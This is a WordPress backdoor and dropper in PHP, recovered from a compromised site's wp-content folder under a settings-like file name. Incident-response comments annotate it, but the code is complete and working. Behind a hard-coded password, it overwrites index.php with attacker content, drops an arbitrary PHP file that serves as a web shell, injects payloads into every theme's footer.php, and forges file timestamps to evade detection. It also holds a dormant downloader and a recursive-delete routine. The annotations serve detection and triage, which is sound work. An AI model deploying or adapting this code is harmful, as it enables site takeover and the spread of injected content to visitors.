File: //var/www/babazi.club/root/wp-content/wp-setingos.php
<?php
// NOTE(review): this is not application code. It is a WordPress injector / dropper
// (recovered under wp-content/ per the path header above). The comments below are
// triage annotations for detection and incident response; the code itself is left
// untouched and must not be deployed or "fixed". Visible capabilities:
//   - remote access gated only by a hard-coded password ("sem2022")
//   - rewriting of <docroot>/index.php with attacker-supplied content (action=beindex)
//   - dropping an arbitrary PHP file at <docroot>/aver.php (action=beindex)
//   - injecting content into every theme's footer.php (action=belink)
//   - chmod 0777 on targets before writing, then mtime forgery via ModifyTime()
//
// Silence every error channel so a failed write or warning never reaches the
// response body or the error log.
ini_set('display_errors', 0);
ini_set('display_startup_errors',0);
error_reporting(0);
/*
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
}
*/
// Shared secret (IOC). Checked with loose `!=` and no constant-time compare; it is read
// from $_REQUEST, so it is accepted via GET, POST or cookie alike.
$sysPwd="sem2022";
$action='';
$password='';
if(isset($_REQUEST['action']))
{
$action=$_REQUEST['action'];
}
if(isset($_REQUEST['password']))
{
$password=$_REQUEST['password'];
}
// Every reply is wrapped in the literal marker `__success__...__success__`. That string
// is a reliable pivot for hunting in access logs, WAF logs and HTTP captures.
if($action==""||$password=="")
{
die('__success__parameters error #1__success__');
}
if($password!=$sysPwd)
{
die('__success__parameters error #2__success__');
}
// action=beindex — prepend attacker content to <docroot>/index.php and drop aver.php.
//   aver         base64  written verbatim to <docroot>/aver.php (arbitrary PHP = web shell)
//   fileplus     base64  prepended to index.php
//   checkstring  raw     wrapped as <!--...--> and used as an idempotency marker
// The marker is the one request parameter that is NOT base64-decoded.
if($action=='beindex')
{
$aver='';
$fileplus='';
$checkstring='';
if(isset($_REQUEST['aver']))
{
$aver=$_REQUEST['aver'];
$aver=base64_decode($aver);
}
if(isset($_REQUEST['fileplus']))
{
$fileplus=$_REQUEST['fileplus'];
$fileplus=base64_decode($fileplus);
}
if(isset($_REQUEST['checkstring']))
{
$checkstring=$_REQUEST['checkstring'];
$checkstring='<!--'.$checkstring.'-->';
}
if($aver==""||$fileplus==""||$checkstring=="")
{
die('__success__parameters error #3__success__');
}
// Document root is derived from the request URL by GetRootPath() (below), not from
// any WordPress constant.
$rootPath=GetRootPath();
$filePath=$rootPath.'/index.php';
$filePath2=$rootPath.'/backup.txt';
$filePath3=$rootPath.'/aver.php';
if(!file_exists($filePath))
{
die('__success__file-not-exist__success__');
}
// World-writable so the rewrite below succeeds regardless of ownership; ModifyTime()
// later resets it to 0644.
chmod($filePath,0777);
$filebody=file_get_contents($filePath);
// The '___' prefix only shifts strpos() away from offset 0; it carries no meaning.
// If a previous injection exists, keep only the text after the LAST marker (the
// original index.php body) so re-running replaces the payload instead of stacking it.
if(strpos('___'.$filebody,$checkstring)!==false)
{
$arrParts=explode($checkstring,$filebody);
$filebody=$arrParts[count($arrParts)-1];
}
if(strpos('___'.$filebody,$checkstring)===false)
{
// Resulting index.php layout: <fileplus>\r\n<!--checkstring--><original body>.
$filebody=$fileplus."\r\n".$checkstring.$filebody;
$fp=fopen($filePath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
// backup.txt is a plain copy of the already-modified index.php, not of the original
// (IOC: <docroot>/backup.txt).
$fp=fopen($filePath2,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
// aver.php receives the decoded `aver` parameter unchanged (IOC: <docroot>/aver.php).
$fp=fopen($filePath3,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$aver);
fclose($fp);
}
// Re-read to confirm the marker landed, then forge the mtime and report.
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,$checkstring)!==false)
{
ModifyTime($rootPath,$filePath);
echo '__success__ok__success__';
exit;
}
else
{
echo '__success__failed__success__';
exit;
}
}
// action=belink — for every directory under wp-content/themes whose footer.php contains
// `</body>`, insert "<!--checkstring-->\r\n<fileplus>" immediately before `</body>`.
//   fileplus     base64  injected content
//   checkstring  raw     idempotency marker, as above
// Reply is `ok-<N>` with N = number of footers that carry the marker afterwards.
else if($action=='belink')
{
$fileplus='';
$checkstring='';
if(isset($_REQUEST['fileplus']))
{
$fileplus=$_REQUEST['fileplus'];
$fileplus=base64_decode($fileplus);
}
if(isset($_REQUEST['checkstring']))
{
$checkstring=$_REQUEST['checkstring'];
$checkstring='<!--'.$checkstring.'-->';
}
if($fileplus==""||$checkstring=="")
{
die('__success__parameters error #3__success__');
}
$rootPath=GetRootPath();
if(!is_dir($rootPath.'/wp-content/themes'))
{
die('__success__folder themes not exist__success__');
}
// GetFolders() returns a '|'-joined list with a trailing '|', so the last element is ''.
$folders= GetFolders($rootPath.'/wp-content/themes',false);
$arrParts=explode("|",$folders);
$result=0;
// NOTE(review): $arrParts is reassigned inside the loop (explode on the marker) and
// count($arrParts) is re-evaluated every iteration, so once a footer that already has
// the marker is hit, the theme list is clobbered and the loop bounds change. Observed
// as-is; left unmodified.
for($n=0;$n<count($arrParts);$n++)
{
$fileFolder=$arrParts[$n];
$filePath=$fileFolder.'/footer.php';
if(!file_exists($filePath))
{
continue;
}
chmod($filePath,0777);
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,'</body>')===false)
{
continue;
}
// Already injected: keep everything before the marker and close the document with a
// literal `</body></html>`. Anything that followed the marker in the file is dropped.
if(strpos('___'.$filebody,$checkstring)!==false)
{
$arrParts=explode($checkstring,$filebody);
$filebody=$arrParts[0].'</body></html>';
}
if(strpos('___'.$filebody,$checkstring)===false)
{
// str_replace is unbounded: every `</body>` occurrence in the footer gets the payload.
$filebody=str_replace('</body>',$checkstring."\r\n".$fileplus.'</body>',$filebody);
$fp=fopen($filePath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
}
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,$checkstring)!==false)
{
// mtime is forged relative to the site root, not the theme directory.
ModifyTime($rootPath,$filePath);
$result++;
}
}
if($result>0)
{
echo '__success__ok-'.$result.'__success__';
exit;
}
else
{
echo '__success__failed__success__';
exit;
}
}
// Anti-forensics helper: forge the mtime of a freshly written file so it blends in.
// $dir      directory whose files are sampled for a plausible timestamp (the site root
//           at both call sites above)
// $filePath file whose mtime is overwritten; left at mode 0644 on return
// The timestamp is borrowed from a random regular file in $dir when one is found and is
// not $filePath itself; otherwise a random instant between 2009-01-01 and 2019-01-01.
// NOTE(review): touch() rewrites mtime/atime only, so the inode change time still
// reflects the real write on typical filesystems — compare ctime against mtime on
// index.php / footer.php when triaging.
function ModifyTime($dir,$filePath)
{
chmod($filePath,0777);
$randomFile= GetRandomFile($dir);
// GetRandomFile() can return '' (trailing list separator); that falls through to the
// random-date branch.
if(!empty($randomFile)&&$randomFile!=$filePath)
{
$time=filemtime($randomFile);
}
else
{
$time=randomDate('2009-01-01','2019-01-01',false);
}
touch($filePath,$time);
chmod($filePath,0644);
}
// Return a random instant in [$begintime, $endtime].
// $begintime  strtotime()-parsable lower bound
// $endtime    strtotime()-parsable upper bound; "" means "now" via mktime() with no
//             arguments (the only caller in this file always passes an explicit end)
// $now        true  -> formatted "Y-m-d H:i:s" string; false -> integer Unix timestamp
// Uses rand(), i.e. not cryptographically random; here it only feeds mtime forgery.
function randomDate($begintime, $endtime="", $now = true)
{
$begin = strtotime($begintime);
$end = $endtime == "" ? mktime() : strtotime($endtime);
$timestamp = rand($begin, $end);
return $now ? date("Y-m-d H:i:s", $timestamp) : $timestamp;
}
// Derive the site document root from the request URL rather than from any WordPress
// constant. The URL "scheme://host/a/b/script.php" is split on "/" and one "../" is
// emitted per path segment beyond the first four, so a script at /wp-content/x.php
// resolves to its parent directory. The result is realpath(dirname(__FILE__) . "/../...").
// NOTE(review): PHP_SELF can carry extra path segments (PATH_INFO) supplied by the
// requester, which would add "../" steps and move the computed root upward — worth
// checking in access logs if targets outside the web root were touched.
function GetRootPath()
{
$returnVal='';
$locationUrl=GetLocationURL();
$arrParts=explode("/",$locationUrl);
$prevUrl='';
for($n=0;$n<count($arrParts)-4;$n++)
{
if($n==0)
{
$prevUrl.= '/../';
}
else
{
$prevUrl.= '../';
}
}
$returnVal=realpath(dirname(__FILE__).$prevUrl);
return $returnVal;
}
// Full URL of the current request: scheme (from is_https()) + Host header + PHP_SELF.
// Both HTTP_HOST and PHP_SELF originate from the client request; the only consumer in
// this file, GetRootPath(), uses the number of "/"-separated segments, not the values.
function GetLocationURL()
{
return is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
}
// URL of the current request with the last path segment removed, always ending in "/".
// Built from the same client-supplied Host and PHP_SELF as GetLocationURL().
// Not referenced anywhere in this file.
function GetLocationURLPath()
{
$pageURL = is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$arrParts=explode("/",$pageURL);
$pageURL='';
for($n=0;$n<count($arrParts)-1;$n++)
{
$pageURL.= $arrParts[$n].'/';
}
return $pageURL;
}
// List the sub-directories of $dir as a '|'-separated string ("$dir/name|...").
// $dir     directory to scan (no trailing slash expected)
// $is_sub  when true, also append each sub-directory's own children (one level only:
//          the recursive call passes false)
// The result always ends with '|', so explode("|", ...) yields a trailing '' entry.
// Used by action=belink to enumerate wp-content/themes.
function GetFolders($dir,$is_sub)
{
$returnVal='';
$files = array();
$dir_list = scandir($dir);
foreach($dir_list as $file)
{
if($file=='..' || $file=='.')
continue;
if(!is_dir($dir.'/'.$file))
continue;
$returnVal.=$dir.'/'.$file.'|';
if($is_sub)
{
$returnVal.=GetFolders($dir.'/'.$file,false);
}
}
return $returnVal;
}
// List the non-directory entries of $dir as a '|'-separated string ("$dir/name|...").
// $dir  directory to scan (no trailing slash expected)
// The result always ends with '|'. The `== ''` guard can never fire since the path
// always contains "/"; it is dead code. Used by GetRandomFile() for mtime forgery.
function GetFiles($dir)
{
$returnVal='';
$files = array();
$dir_list = scandir($dir);
foreach($dir_list as $file)
{
if($file=='..' || $file=='.')
continue;
if(is_dir($dir.'/'.$file))
continue;
if($dir.'/'.$file=='')
continue;
$returnVal.=$dir.'/'.$file.'|';
}
return $returnVal;
}
// Pick one random regular file path from $dir, or '' — the trailing separator from
// GetFiles() leaves an empty element that mt_rand() may select. Callers (ModifyTime)
// treat '' as "no candidate". Feeds timestamp forgery only.
function GetRandomFile($dir)
{
$files=GetFiles($dir);
$arrParts=explode("|",$files);
$index=mt_rand(0,count($arrParts)-1);
$filePath=$arrParts[$index];
return $filePath;
}
// Recursively create $path and any missing parents, each with mode 0777.
// Not referenced anywhere in this file (dormant helper).
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
// Recursively create $dir and any missing parents with mode 0777; returns true on
// success, false as soon as any mkdir() fails. Not referenced anywhere in this file.
function mkdirs($dir)
{
if(!is_dir($dir))
{
if(!mkdirs(dirname($dir)))
{ return false; }
if(!mkdir($dir,0777))
{ return false; }
}
return true;
}
// Recursively delete $dir and everything beneath it (files via unlink(), directories
// via recursion, then rmdir()). Destructive; not referenced anywhere in this file, but
// its presence signals a cleanup/wipe capability in this toolkit.
function rmdirs($dir)
{
$d = dir($dir);
while (false !== ($child = $d->read()))
{
if($child != '.' && $child != '..')
{
if(is_dir($dir.'/'.$child))
rmdirs($dir.'/'.$child);
else
unlink($dir.'/'.$child);
}
}
$d->close();
rmdir($dir);
}
// Return "https://" or "http://" for the current request. HTTPS is assumed when the
// server sets $_SERVER['HTTPS'] to anything but "off", or when the client sends
// X-Forwarded-Proto: https or a non-"off" Front-End-Https header — both of those are
// request headers and therefore client-controllable. In this file the scheme only
// affects the URL string fed to GetRootPath(), whose segment count is the same either way.
function is_https()
{
if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
return 'https://';
} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
return 'https://';
} elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
return 'https://';
}
return 'http://';
}
// Fetch $url and return the response body as a string (generic downloader; not called
// anywhere in this file, but indicates second-stage / remote-fetch capability).
// Transport preference: cURL, then file_get_contents(), then a raw fsockopen() GET.
// Egress IOC: the fixed User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
// SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" on outbound requests.
function GetHttpPage($url)
{
$output = '';
$time_out = 30;
if (function_exists ( 'curl_init' ))
{
$ch = curl_init ();
curl_setopt($ch, CURLOPT_URL, $url );
// TLS peer verification is disabled, so the fetch accepts any certificate.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true );
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out );
// Redirects are followed without limit.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
$output = curl_exec($ch );
curl_close ($ch);
}
elseif (function_exists ( 'file_get_contents' ))
{
$context = stream_context_create(array('http' => array('timeout' => $time_out)));
$output = file_get_contents ( $url, false, $context);
}
// Raw-socket fallback: ignores the URL scheme and port (always TCP/80), sends a bare
// HTTP/1.1 GET, and returns headers plus body unparsed. On connect failure it exit()s
// after printing the error, which would leak the error text into the HTTP response.
elseif (ini_get ( "allow_url_fopen" ) == "1")
{
$errstr = '';
$errno = '';
$info = parse_url ( $url );
$fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
$head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n";
$head .= "Host: " . $info ['host'] . "\r\n";
$head .= "Connection: Close\r\n\r\n";
fwrite($fp, $head);
while ( ! feof ( $fp ) ) {
$output .= fgets ( $fp, 128 );
}
fclose ( $fp );
}
return $output;
}
?>